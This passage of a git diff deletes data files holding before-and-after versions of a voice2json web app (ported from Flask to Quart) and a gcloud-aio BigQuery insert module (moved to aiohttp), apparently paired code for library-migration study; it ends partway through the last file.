b/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py deleted file mode 100644 index 18ab56e..0000000 --- a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py +++ 
/dev/null @@ -1,480 +0,0 @@ -#!/usr/bin/env python3 -import io -import re -import json -import argparse -import subprocess -import logging -import time -import shlex -import tempfile -import threading -import wave -import atexit -import base64 -from uuid import uuid4 -from pathlib import Path -from typing import Optional, Dict, Any, Tuple, BinaryIO, List - -import pydash -from flask import Flask, request, render_template, send_from_directory, flash, send_file - -# ----------------------------------------------------------------------------- - -profile_path: Optional[Path] = None -profile: Dict[str, Any] = {} - -# Flask application -app = Flask("voice2json") -app.secret_key = str(uuid4()) - -logger = logging.getLogger("app") - -# ----------------------------------------------------------------------------- - -record_proc: Optional[subprocess.Popen] = None -record_file: Optional[BinaryIO] = None -recording: bool = False - - -@app.route("/", methods=["GET", "POST"]) -def index(): - """Handles recording, transcription, and intent recognition.""" - global record_proc, record_file, recording - - # Sentence to recognize - sentence: str = "" - - # Recognized intent - intent: Optional[Dict[str, Any]] = None - - # List of (word, entity) tuples from recognized intent - words_entities: List[Tuple[str, Dict[str, Any]]] = [] - - if request.method == "POST": - # WAV audio data - wav_data: Optional[bytes] = None - - # Check if start/stopping recording - if "record" in request.form: - if record_proc is None: - # Start recording - record_file = tempfile.NamedTemporaryFile(mode="wb+") - record_command = shlex.split( - pydash.get(profile, "audio.record-command") - ) - logger.debug(record_command) - - record_proc = subprocess.Popen(record_command, stdout=record_file) - recording = True - else: - # Stop recording - record_proc.terminate() - record_proc.wait() - record_proc = None - recording = False - - # Read raw audio data from temp file - record_file.seek(0) - raw_audio_data = record_file.read() - - # Convert to WAV data - with io.BytesIO() as wav_buffer: - with wave.open(wav_buffer, mode="wb") as wav_file: - wav_file.setframerate(16000) - wav_file.setsampwidth(2) - wav_file.setnchannels(1) - wav_file.writeframesraw(raw_audio_data) - - wav_data = wav_buffer.getvalue() - - # Clean up - del record_file - record_file = None - elif "upload" in request.form: - if "wavfile" in request.files: - # Get WAV data from file upload - wav_file = request.files["wavfile"] - wav_data = wav_file.read() - else: - flash("No WAV file given", "danger") - elif "recognize" in request.form: - # Get sentence to recognize from form - sentence = request.form["sentence"] - if len(sentence) == 0: - flash("No sentence to recognize", "danger") - - # --------------------------------------------------------------------- - - if wav_data is not None: - # Transcribe WAV - logger.debug(f"Transcribing {len(wav_data)} byte(s)") - transcribe_result = json.load( - voice2json("transcribe-wav", text=False, input=wav_data) - ) - sentence = transcribe_result.get( - "raw_text", transcribe_result.get("text", "") - ) - - if len(sentence) > 0: - # Recognize text - recognize_result = json.load( - voice2json("recognize-intent", input=json.dumps(transcribe_result)) - ) - intent = recognize_result - - # Process intent - if intent is not None: - char_index = 0 - - # Map from start character index to entity - start_to_entity = { - e.get("raw_start", -1): e for e in intent.get("entities", []) - } - entity = None - - # Go through words (tokens) - for token in 
intent.get("raw_tokens", intent.get("tokens", [])): - if entity and (char_index >= entity.get("raw_end", -1)): - # Entity has finished - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - entity = None - - if entity is None: - # Entity is starting - entity = start_to_entity.get(char_index) - - if entity is None: - # Regular word - words_entities.append((token, None)) - - char_index += len(token) + 1 # +1 for space - - if entity: - # Catch entity at end of sentence - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - - # ------------------------------------------------------------------------- - - # JSON for display to user - intent_str = json.dumps(intent, indent=4) if intent is not None else "" - - return render_template( - "index.html", - profile=profile, - pydash=pydash, - sentence=sentence, - intent=intent, - intent_str=intent_str, - words_entities=words_entities, - recording=recording, - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/sentences", methods=["GET", "POST"]) -def sentences(): - """Reads/writes sentences.ini. Re-trains when sentences are saved.""" - sentences_path = Path(pydash.get(profile, "training.sentences-file")) - - if request.method == "POST": - # Save sentences - sentences_text = request.form["sentences"] - sentences_path.write_text(sentences_text) - do_retrain() - else: - # Load sentences - sentences_text = sentences_path.read_text() - - return render_template( - "sentences.html", profile=profile, pydash=pydash, sentences=sentences_text - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/words", methods=["GET", "POST"]) -def words(): - """Speaks words, guesses pronunciations, and reads/writes custom_words.txt. 
- Re-trains when custom words are saved.""" - - custom_words_path = Path(pydash.get(profile, "training.custom-words-file")) - word = "" - - if request.method == "POST": - action = request.form["action"] - - if action == "custom words": - # Save custom words - custom_words_text = request.form["custom_words"] - custom_words_path.write_text(custom_words_text) - do_retrain() - elif action == "pronounce": - # Speak or guess pronunciation - word = request.form["word"] - is_speak = "speak" in request.form - if len(word) > 0: - if is_speak: - # Speak pronunciation - result = voice2json("pronounce-word", "--nbest", "1", word) - else: - # Get multiple guesses - result = voice2json( - "pronounce-word", "--quiet", "--nbest", "3", word - ) - - # Display guess(s) - for line in result: - flash(line.strip(), "info") - else: - flash("No word given", "danger") - - # Load custom words - custom_words_text = custom_words_path.read_text() - - return render_template( - "words.html", - profile=profile, - pydash=pydash, - custom_words=custom_words_text, - word=word, - ) - - -# ----------------------------------------------------------------------------- - -espeak_words = {} -wav_cache = {} -espeak_cache_dir = tempfile.TemporaryDirectory() - -atexit.register(lambda: espeak_cache_dir.cleanup()) - - -@app.route("/phonemes", methods=["GET", "POST"]) -def phonemes(): - phoneme_map_path = Path(pydash.get(profile, "text-to-speech.espeak.phoneme-map")) - phoneme_map = {} - - if request.method == "POST": - for var_name, var_value in request.form.items(): - if var_name.startswith("espeak_"): - phoneme = var_name[7:] - phoneme_map[phoneme] = var_value.strip() - - with open(phoneme_map_path, "w") as phoneme_map_file: - for phoneme in sorted(phoneme_map): - print(phoneme, phoneme_map[phoneme], file=phoneme_map_file) - - flash(f"Wrote {phoneme_map_path}", "success") - - # Clear phoneme cache - for key in list(wav_cache.keys()): - if key.startswith("phoneme_"): - wav_cache.pop(key, None) - else: - # Load map from dictionary phonemes to eSpeak phonemes - with open(phoneme_map_path, "r") as phoneme_map_file: - for line in phoneme_map_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - dict_phoneme, espeak_phoneme = re.split("\s+", line, maxsplit=1) - phoneme_map[dict_phoneme] = espeak_phoneme - - # Load word examples for each phoneme - phoneme_examples_path = Path( - pydash.get(profile, "speech-to-text.phoneme-examples-file") - ) - voice = pydash.get(profile, "text-to-speech.espeak.voice", "") - phoneme_examples = {} - - with open(phoneme_examples_path, "r") as phoneme_examples_file: - for line in phoneme_examples_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - phoneme, word, pronunciation = re.split(r"\s+", line, maxsplit=2) - espeak_phoneme_str = "".join(phoneme_map[p] for p in pronunciation.split()) - - word_cache_key = f"word_{word}" - phoneme_cache_key = ( - "phoneme_" - + phoneme - + "_" - + base64.b64encode(espeak_phoneme_str.encode()).decode() - ) - - if word_cache_key not in wav_cache: - # Speak whole word - wav_path = Path(espeak_cache_dir.name) / f"{word_cache_key}.wav" - espeak_cmd = ["espeak-ng", "--sep= ", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(word) - logger.debug(espeak_cmd) - result = subprocess.check_output( - espeak_cmd, universal_newlines=True - ).strip() - - espeak_word_str = result.replace("'", "") - espeak_words[word] = espeak_word_str - 
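One small detail in the phoneme-map parsing just above: the first re.split call uses the non-raw pattern "\s+", which only works because Python preserves the invalid escape \s (a DeprecationWarning since Python 3.6); the second call already uses the raw form. A minimal sketch of the safer spelling (the sample line is hypothetical):

    import re

    line = "AA ah"  # hypothetical "dictionary phoneme -> eSpeak phoneme" map entry
    # r"\s+" avoids the invalid "\s" escape that the non-raw "\s+" depends on
    dict_phoneme, espeak_phoneme = re.split(r"\s+", line, maxsplit=1)
    assert (dict_phoneme, espeak_phoneme) == ("AA", "ah")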
wav_cache[word_cache_key] = wav_path - - if phoneme_cache_key not in wav_cache: - # Speak mapped phonemes - wav_path = Path(espeak_cache_dir.name) / f"{phoneme_cache_key}.wav" - espeak_cmd = ["espeak-ng", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(f"[[{espeak_phoneme_str}]]") - logger.debug(espeak_cmd) - subprocess.check_call(espeak_cmd) - wav_cache[phoneme_cache_key] = wav_path - - actual_espeak = " ".join(phoneme_map[p] for p in pronunciation.split()) - phoneme_examples[phoneme] = { - "word": word, - "pronunciation": pronunciation, - "expected": espeak_words[word], - "actual": actual_espeak, - "phoneme_key": phoneme_cache_key, - } - - # logger.debug(phoneme_examples) - - return render_template( - "phonemes.html", - sorted=sorted, - profile=profile, - pydash=pydash, - phoneme_examples=phoneme_examples, - phoneme_map=phoneme_map, - ) - - -@app.route("/pronounce/", methods=["GET"]) -def pronounce(name): - wav_path = wav_cache[name] - return send_file(open(wav_path, "rb"), mimetype="audio/wav") - - -# ----------------------------------------------------------------------------- -# Static Routes -# ----------------------------------------------------------------------------- - - -@app.route("/css/", methods=["GET"]) -def css(filename): - return send_from_directory("css", filename) - - -@app.route("/js/", methods=["GET"]) -def js(filename): - return send_from_directory("js", filename) - - -@app.route("/img/", methods=["GET"]) -def img(filename): - return send_from_directory("img", filename) - - -@app.errorhandler(Exception) -def handle_error(err) -> Tuple[str, int]: - logger.exception(err) - return (str(err), 500) - - -# ----------------------------------------------------------------------------- -# Utility Methods -# ----------------------------------------------------------------------------- - - -def voice2json(*args, text=True, input=None, stderr=None): - """Calls voice2json with the given arguments and current profile.""" - global profile_path - command = ["voice2json"] - - if profile_path is not None: - # Add profile - command.extend(["--profile", str(profile_path)]) - - command.extend(list(args)) - logger.debug(command) - - if text: - # Text-based I/O - return io.StringIO( - subprocess.check_output( - command, universal_newlines=True, input=input, stderr=stderr - ) - ) - else: - # Binary I/O - return io.BytesIO(subprocess.check_output(command, input=input, stderr=stderr)) - - -def do_retrain(): - """Re-trains voice2json profile and flashes warnings for unknown words.""" - # Re-train - start_time = time.time() - result = voice2json("train-profile", stderr=subprocess.STDOUT).read() - train_seconds = time.time() - start_time - flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") - - logger.debug(result) - - warn_lines = None - for line in result.splitlines(): - line = line.strip() - if line.startswith("-") or line.startswith("."): - continue - - if "unknown" in line: - warn_lines = [] - line = line + ":" - - if warn_lines is not None: - warn_lines.append(line) - - if warn_lines is not None: - flash("\n".join(warn_lines), "warning") - - -# ----------------------------------------------------------------------------- - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--debug", action="store_true", help="Enable DEBUG mode") - parser.add_argument( - "--port", type=int, default=5000, help="Web server port (default: 5000)" - ) - parser.add_argument( - "--host", 
default="127.0.0.1", help="Web server host (default: 127.0.0.1)" - ) - parser.add_argument("--profile", help="Path to voice2json profile") - args = parser.parse_args() - - if args.debug: - logging.basicConfig(level=logging.DEBUG) - - logger.debug(args) - - if args.profile is not None: - profile_path = Path(args.profile) - - # Get profile as JSON from voice2json - profile = json.load(voice2json("print-profile")) - - # Start web server - app.run(port=args.port, host=args.host, debug=args.debug) diff --git a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py b/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py deleted file mode 100644 index 1cc105b..0000000 --- a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.target.py +++ /dev/null @@ -1,489 +0,0 @@ -#!/usr/bin/env python3 -import io -import re -import json -import argparse -import subprocess -import logging -import time -import shlex -import tempfile -import threading -import wave -import atexit -import base64 -from uuid import uuid4 -from pathlib import Path -from typing import Optional, Dict, Any, Tuple, BinaryIO, List - -import pydash -from quart import Quart, request, render_template, send_from_directory, flash, send_file - -# ----------------------------------------------------------------------------- - -profile_path: Optional[Path] = None -profile: Dict[str, Any] = {} - -# Quart application -app = Quart("voice2json") -app.secret_key = str(uuid4()) - -logger = logging.getLogger("app") - -# ----------------------------------------------------------------------------- - -record_proc: Optional[subprocess.Popen] = None -record_file: Optional[BinaryIO] = None -recording: bool = False - - -@app.route("/", methods=["GET", "POST"]) -async def index(): - """Handles recording, transcription, and intent recognition.""" - global record_proc, record_file, recording - - # Sentence to recognize - sentence: str = "" - - # Recognized intent - intent: Optional[Dict[str, Any]] = None - - # List of (word, entity) tuples from recognized intent - words_entities: List[Tuple[str, Dict[str, Any]]] = [] - - if request.method == "POST": - # WAV audio data - wav_data: Optional[bytes] = None - - # Check if start/stopping recording - form = await request.form - if "record" in form: - if record_proc is None: - # Start recording - record_file = tempfile.NamedTemporaryFile(mode="wb+") - record_command = shlex.split( - pydash.get(profile, "audio.record-command") - ) - logger.debug(record_command) - - record_proc = subprocess.Popen(record_command, stdout=record_file) - recording = True - else: - # Stop recording - record_proc.terminate() - record_proc.wait() - record_proc = None - recording = False - - # Read raw audio data from temp file - record_file.seek(0) - raw_audio_data = record_file.read() - - # Convert to WAV data - with io.BytesIO() as wav_buffer: - with wave.open(wav_buffer, mode="wb") as wav_file: - wav_file.setframerate(16000) - wav_file.setsampwidth(2) - wav_file.setnchannels(1) - wav_file.writeframesraw(raw_audio_data) - - wav_data = wav_buffer.getvalue() - - # Clean up - del record_file - record_file = None - elif "upload" in form: - files = await request.files - if "wavfile" in files: - # Get WAV data from file upload - wav_file = files["wavfile"] - wav_data = wav_file.read() - else: - await flash("No WAV file given", "danger") - elif "recognize" in form: - # Get sentence to recognize from form - sentence = form["sentence"] - if len(sentence) == 0: - await flash("No sentence to recognize", 
"danger") - - transcribe_result = { - "text": sentence.strip() - } - - # --------------------------------------------------------------------- - - if wav_data is not None: - # Transcribe WAV - logger.debug(f"Transcribing {len(wav_data)} byte(s)") - transcribe_result = json.load( - voice2json("transcribe-wav", text=False, input=wav_data) - ) - sentence = transcribe_result.get( - "raw_text", transcribe_result.get("text", "") - ) - - if len(sentence) > 0: - # Recognize text - recognize_result = json.load( - voice2json("recognize-intent", input=json.dumps(transcribe_result)) - ) - intent = recognize_result - - # Process intent - if intent is not None: - char_index = 0 - - # Map from start character index to entity - start_to_entity = { - e.get("raw_start", -1): e for e in intent.get("entities", []) - } - entity = None - - # Go through words (tokens) - for token in intent.get("raw_tokens", intent.get("tokens", [])): - if entity and (char_index >= entity.get("raw_end", -1)): - # Entity has finished - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - entity = None - - if entity is None: - # Entity is starting - entity = start_to_entity.get(char_index) - - if entity is None: - # Regular word - words_entities.append((token, None)) - - char_index += len(token) + 1 # +1 for space - - if entity: - # Catch entity at end of sentence - words_entities.append( - (entity.get("raw_value", entity.get("value", "")), entity) - ) - - # ------------------------------------------------------------------------- - - # JSON for display to user - intent_str = json.dumps(intent, indent=4) if intent is not None else "" - - return await render_template( - "index.html", - profile=profile, - pydash=pydash, - sentence=sentence, - intent=intent, - intent_str=intent_str, - words_entities=words_entities, - recording=recording, - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/sentences", methods=["GET", "POST"]) -async def sentences(): - """Reads/writes sentences.ini. Re-trains when sentences are saved.""" - sentences_path = Path(pydash.get(profile, "training.sentences-file")) - - if request.method == "POST": - # Save sentences - form = await request.form - sentences_text = form["sentences"] - sentences_path.write_text(sentences_text) - do_retrain() - else: - # Load sentences - sentences_text = sentences_path.read_text() - - return await render_template( - "sentences.html", profile=profile, pydash=pydash, sentences=sentences_text - ) - - -# ----------------------------------------------------------------------------- - - -@app.route("/words", methods=["GET", "POST"]) -async def words(): - """Speaks words, guesses pronunciations, and reads/writes custom_words.txt. 
- Re-trains when custom words are saved.""" - - custom_words_path = Path(pydash.get(profile, "training.custom-words-file")) - word = "" - - if request.method == "POST": - form = await request.form - action = form["action"] - - if action == "custom words": - # Save custom words - custom_words_text = form["custom_words"] - custom_words_path.write_text(custom_words_text) - do_retrain() - elif action == "pronounce": - # Speak or guess pronunciation - word = form["word"] - is_speak = "speak" in form - if len(word) > 0: - if is_speak: - # Speak pronunciation - result = voice2json("pronounce-word", "--nbest", "1", word) - else: - # Get multiple guesses - result = voice2json( - "pronounce-word", "--quiet", "--nbest", "3", word - ) - - # Display guess(s) - for line in result: - await flash(line.strip(), "info") - else: - await flash("No word given", "danger") - - # Load custom words - custom_words_text = custom_words_path.read_text() - - return await render_template( - "words.html", - profile=profile, - pydash=pydash, - custom_words=custom_words_text, - word=word, - ) - - -# ----------------------------------------------------------------------------- - -espeak_words = {} -wav_cache = {} -espeak_cache_dir = tempfile.TemporaryDirectory() - -atexit.register(lambda: espeak_cache_dir.cleanup()) - - -@app.route("/phonemes", methods=["GET", "POST"]) -async def phonemes(): - phoneme_map_path = Path(pydash.get(profile, "text-to-speech.espeak.phoneme-map")) - phoneme_map = {} - - if request.method == "POST": - form = await request.form - for var_name, var_value in form.items(): - if var_name.startswith("espeak_"): - phoneme = var_name[7:] - phoneme_map[phoneme] = var_value.strip() - - with open(phoneme_map_path, "w") as phoneme_map_file: - for phoneme in sorted(phoneme_map): - print(phoneme, phoneme_map[phoneme], file=phoneme_map_file) - - await flash(f"Wrote {phoneme_map_path}", "success") - - # Clear phoneme cache - for key in list(wav_cache.keys()): - if key.startswith("phoneme_"): - wav_cache.pop(key, None) - else: - # Load map from dictionary phonemes to eSpeak phonemes - with open(phoneme_map_path, "r") as phoneme_map_file: - for line in phoneme_map_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - dict_phoneme, espeak_phoneme = re.split("\s+", line, maxsplit=1) - phoneme_map[dict_phoneme] = espeak_phoneme - - # Load word examples for each phoneme - phoneme_examples_path = Path( - pydash.get(profile, "speech-to-text.phoneme-examples-file") - ) - voice = pydash.get(profile, "text-to-speech.espeak.voice", "") - phoneme_examples = {} - - with open(phoneme_examples_path, "r") as phoneme_examples_file: - for line in phoneme_examples_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - phoneme, word, pronunciation = re.split(r"\s+", line, maxsplit=2) - espeak_phoneme_str = "".join(phoneme_map[p] for p in pronunciation.split()) - - word_cache_key = f"word_{word}" - phoneme_cache_key = ( - "phoneme_" - + phoneme - + "_" - + base64.b64encode(espeak_phoneme_str.encode()).decode() - ) - - if word_cache_key not in wav_cache: - # Speak whole word - wav_path = Path(espeak_cache_dir.name) / f"{word_cache_key}.wav" - espeak_cmd = ["espeak-ng", "--sep= ", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(word) - logger.debug(espeak_cmd) - result = subprocess.check_output( - espeak_cmd, universal_newlines=True - ).strip() - - espeak_word_str = result.replace("'", "") - 
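The web/app.py migration in this file follows the standard Flask to Quart conversion: handlers become async def, and request.form, request.files, flash(), and render_template() are awaited. One pitfall is visible in the migrated code: do_retrain() became a coroutine (it awaits flash()), yet its call sites in sentences() and words() still invoke it without await, so the retrain coroutine is created and silently discarded. A hedged sketch of the awaited form (handler abbreviated, names as in the file):

    from pathlib import Path

    @app.route("/sentences", methods=["GET", "POST"])
    async def sentences():
        sentences_path = Path(pydash.get(profile, "training.sentences-file"))
        if request.method == "POST":
            form = await request.form                    # Quart: form access must be awaited
            sentences_path.write_text(form["sentences"])
            await do_retrain()                           # the migrated file omits this "await"
        sentences_text = sentences_path.read_text()
        return await render_template(
            "sentences.html", profile=profile, pydash=pydash, sentences=sentences_text
        )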
espeak_words[word] = espeak_word_str - wav_cache[word_cache_key] = wav_path - - if phoneme_cache_key not in wav_cache: - # Speak mapped phonemes - wav_path = Path(espeak_cache_dir.name) / f"{phoneme_cache_key}.wav" - espeak_cmd = ["espeak-ng", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(f"[[{espeak_phoneme_str}]]") - logger.debug(espeak_cmd) - subprocess.check_call(espeak_cmd) - wav_cache[phoneme_cache_key] = wav_path - - actual_espeak = " ".join(phoneme_map[p] for p in pronunciation.split()) - phoneme_examples[phoneme] = { - "word": word, - "pronunciation": pronunciation, - "expected": espeak_words[word], - "actual": actual_espeak, - "phoneme_key": phoneme_cache_key, - } - - # logger.debug(phoneme_examples) - - return await render_template( - "phonemes.html", - sorted=sorted, - profile=profile, - pydash=pydash, - phoneme_examples=phoneme_examples, - phoneme_map=phoneme_map, - ) - - -@app.route("/pronounce/", methods=["GET"]) -async def pronounce(name): - wav_path = wav_cache[name] - return send_file(open(wav_path, "rb"), mimetype="audio/wav") - - -# ----------------------------------------------------------------------------- -# Static Routes -# ----------------------------------------------------------------------------- - - -@app.route("/css/", methods=["GET"]) -def css(filename): - return send_from_directory("css", filename) - - -@app.route("/js/", methods=["GET"]) -def js(filename): - return send_from_directory("js", filename) - - -@app.route("/img/", methods=["GET"]) -def img(filename): - return send_from_directory("img", filename) - - -@app.errorhandler(Exception) -def handle_error(err) -> Tuple[str, int]: - logger.exception(err) - return (str(err), 500) - - -# ----------------------------------------------------------------------------- -# Utility Methods -# ----------------------------------------------------------------------------- - - -def voice2json(*args, text=True, input=None, stderr=None): - """Calls voice2json with the given arguments and current profile.""" - global profile_path - command = ["voice2json"] - - if profile_path is not None: - # Add profile - command.extend(["--profile", str(profile_path)]) - - command.extend(list(args)) - logger.debug(command) - - if text: - # Text-based I/O - return io.StringIO( - subprocess.check_output( - command, universal_newlines=True, input=input, stderr=stderr - ) - ) - else: - # Binary I/O - return io.BytesIO(subprocess.check_output(command, input=input, stderr=stderr)) - - -async def do_retrain(): - """Re-trains voice2json profile and flashes warnings for unknown words.""" - # Re-train - start_time = time.time() - result = voice2json("train-profile", stderr=subprocess.STDOUT).read() - train_seconds = time.time() - start_time - await flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") - - logger.debug(result) - - warn_lines = None - for line in result.splitlines(): - line = line.strip() - if line.startswith("-") or line.startswith("."): - continue - - if "unknown" in line: - warn_lines = [] - line = line + ":" - - if warn_lines is not None: - warn_lines.append(line) - - if warn_lines is not None: - await flash("\n".join(warn_lines), "warning") - - -# ----------------------------------------------------------------------------- - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--debug", action="store_true", help="Enable DEBUG mode") - parser.add_argument( - "--port", type=int, default=5000, help="Web server 
port (default: 5000)" - ) - parser.add_argument( - "--host", default="127.0.0.1", help="Web server host (default: 127.0.0.1)" - ) - parser.add_argument("--profile", help="Path to voice2json profile") - args = parser.parse_args() - - if args.debug: - logging.basicConfig(level=logging.DEBUG) - - logger.debug(args) - - if args.profile is not None: - profile_path = Path(args.profile) - - # Get profile as JSON from voice2json - profile = json.load(voice2json("print-profile")) - - # Start web server - app.run(port=args.port, host=args.host, debug=args.debug) diff --git a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff b/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff deleted file mode 100644 index 5e4dc0a..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff +++ /dev/null @@ -1,83 +0,0 @@ -diff --git a/bigquery/gcloud/aio/bigquery/bigquery.py b/bigquery/gcloud/aio/bigquery/bigquery.py - index 5b7b4fdb41813c83e0e0a2dbcbeb1f73c8fbbde0..45d94ddaf969648d5479ff480a92b16d537716f9 100644 - --- a/bigquery/gcloud/aio/bigquery/bigquery.py - +++ b/bigquery/gcloud/aio/bigquery/bigquery.py -@@ -2,8 +2,8 @@ import functools - import logging - import uuid - -+import aiohttp - from gcloud.aio.auth import Token --from gcloud.aio.core.http import post - try: - import ujson as json - except ModuleNotFoundError: -@@ -71,46 +71,37 @@ class Table(object): - - async def insert(self, rows, skip_invalid=False, ignore_unknown=True, - session=None): -- - session = session or self.session - -- body = make_insert_body( -- rows, -- skip_invalid=skip_invalid, -- ignore_unknown=ignore_unknown -- ) -- -- headers = await self.headers() -- -- url = '{}/{}'.format( -- API_ROOT, -- INSERT_TEMPLATE.format( -- proj=self.project, -- dataset=self.dataset_name, -- table=self.table_name -- ) -- ) -- -+ url = '{}/{}'.format(API_ROOT, INSERT_TEMPLATE.format( -+ proj=self.project, dataset=self.dataset_name, -+ table=self.table_name)) - log.info('Inserting %d rows to %s', len(rows), url) - -- status, content = await post( -- url, -- payload=body, -- headers=headers -- ) -+ body = make_insert_body(rows, skip_invalid=skip_invalid, -+ ignore_unknown=ignore_unknown) -+ payload = json.dumps(body).encode('utf-8') -+ -+ headers = await self.headers() -+ headers.update({ -+ 'Content-Length': str(len(payload)), -+ 'Content-Type': 'application/json' -+ }) - -- success = 299 >= status >= 200 and 'insertErrors' not in content -+ async with aiohttp.ClientSession() as s: -+ response = await s.post(url, data=payload, headers=headers, -+ params=None, timeout=60) -+ content = await response.json() - -- if success: -- return success -+ if 299 >= response.status >= 200 and 'insertErrors' not in content: -+ return True - -- log.debug('response code: %d', status) -+ log.debug('response code: %d', response.status) - log.debug('url: %s', url) -- log.debug('body:\n%s\n', body) -+ log.debug('body:\n%s\n', payload) - -- raise Exception('Could not insert: {}'.format(json.dumps( -- content, sort_keys=True -- ))) -+ raise Exception('Could not insert: {}'.format( -+ json.dumps(content, sort_keys=True))) - - - async def stream_insert(table, rows): diff --git a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py b/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py deleted file mode 100644 index c623df9..0000000 --- 
a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py +++ /dev/null @@ -1,135 +0,0 @@ -import functools -import logging -import uuid - -from gcloud.aio.auth import Token -from gcloud.aio.core.http import post -try: - import ujson as json -except ModuleNotFoundError: - import json - - -API_ROOT = 'https://www.googleapis.com/bigquery/v2' -INSERT_TEMPLATE = 'projects/{proj}/datasets/{dataset}/tables/{table}/insertAll' -SCOPES = [ - 'https://www.googleapis.com/auth/bigquery.insertdata' -] - -log = logging.getLogger(__name__) - - -def make_insert_body(rows, skip_invalid=False, ignore_unknown=True): - - return { - 'kind': 'bigquery#tableDataInsertAllRequest', - 'skipInvalidRows': skip_invalid, - 'ignoreUnknownValues': ignore_unknown, - 'rows': rows - } - - -def new_insert_id(): - - return uuid.uuid4().hex - - -def make_rows(rows): - - bq_rows = [{ - 'insertId': new_insert_id(), - 'json': row - } for row in rows] - - return bq_rows - - -class Table(object): - - def __init__(self, project, service_file, dataset_name, table_name, - session=None, token=None): - # pylint: disable=too-many-arguments - - self.project = project - self.table_name = table_name - self.dataset_name = dataset_name - self.session = session - self.token = token or Token( - project, - service_file, - session=session, - scopes=SCOPES - ) - - async def headers(self): - - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token) - } - - async def insert(self, rows, skip_invalid=False, ignore_unknown=True, - session=None): - - session = session or self.session - - body = make_insert_body( - rows, - skip_invalid=skip_invalid, - ignore_unknown=ignore_unknown - ) - - headers = await self.headers() - - url = '{}/{}'.format( - API_ROOT, - INSERT_TEMPLATE.format( - proj=self.project, - dataset=self.dataset_name, - table=self.table_name - ) - ) - - log.info('Inserting %d rows to %s', len(rows), url) - - status, content = await post( - url, - payload=body, - headers=headers - ) - - success = 299 >= status >= 200 and 'insertErrors' not in content - - if success: - return success - - log.debug('response code: %d', status) - log.debug('url: %s', url) - log.debug('body:\n%s\n', body) - - raise Exception('Could not insert: {}'.format(json.dumps( - content, sort_keys=True - ))) - - -async def stream_insert(table, rows): - - insert_rows = make_rows(rows) - result = await table.insert(insert_rows) - - return result - - -def make_stream_insert(project, service_file, dataset_name, table_name, - session=None): - - table = Table( - project, - service_file, - dataset_name, - table_name, - session=session - ) - - return functools.partial(stream_insert, table) diff --git a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py b/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py deleted file mode 100644 index 34e5a77..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py +++ /dev/null @@ -1,126 +0,0 @@ -import functools -import logging -import uuid - -import aiohttp -from gcloud.aio.auth import Token -try: - import ujson as json -except ModuleNotFoundError: - import json - - -API_ROOT = 'https://www.googleapis.com/bigquery/v2' -INSERT_TEMPLATE = 'projects/{proj}/datasets/{dataset}/tables/{table}/insertAll' -SCOPES = [ - 'https://www.googleapis.com/auth/bigquery.insertdata' -] - -log = logging.getLogger(__name__) - - -def 
make_insert_body(rows, skip_invalid=False, ignore_unknown=True): - - return { - 'kind': 'bigquery#tableDataInsertAllRequest', - 'skipInvalidRows': skip_invalid, - 'ignoreUnknownValues': ignore_unknown, - 'rows': rows - } - - -def new_insert_id(): - - return uuid.uuid4().hex - - -def make_rows(rows): - - bq_rows = [{ - 'insertId': new_insert_id(), - 'json': row - } for row in rows] - - return bq_rows - - -class Table(object): - - def __init__(self, project, service_file, dataset_name, table_name, - session=None, token=None): - # pylint: disable=too-many-arguments - - self.project = project - self.table_name = table_name - self.dataset_name = dataset_name - self.session = session - self.token = token or Token( - project, - service_file, - session=session, - scopes=SCOPES - ) - - async def headers(self): - - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token) - } - - async def insert(self, rows, skip_invalid=False, ignore_unknown=True, - session=None): - session = session or self.session - - url = '{}/{}'.format(API_ROOT, INSERT_TEMPLATE.format( - proj=self.project, dataset=self.dataset_name, - table=self.table_name)) - log.info('Inserting %d rows to %s', len(rows), url) - - body = make_insert_body(rows, 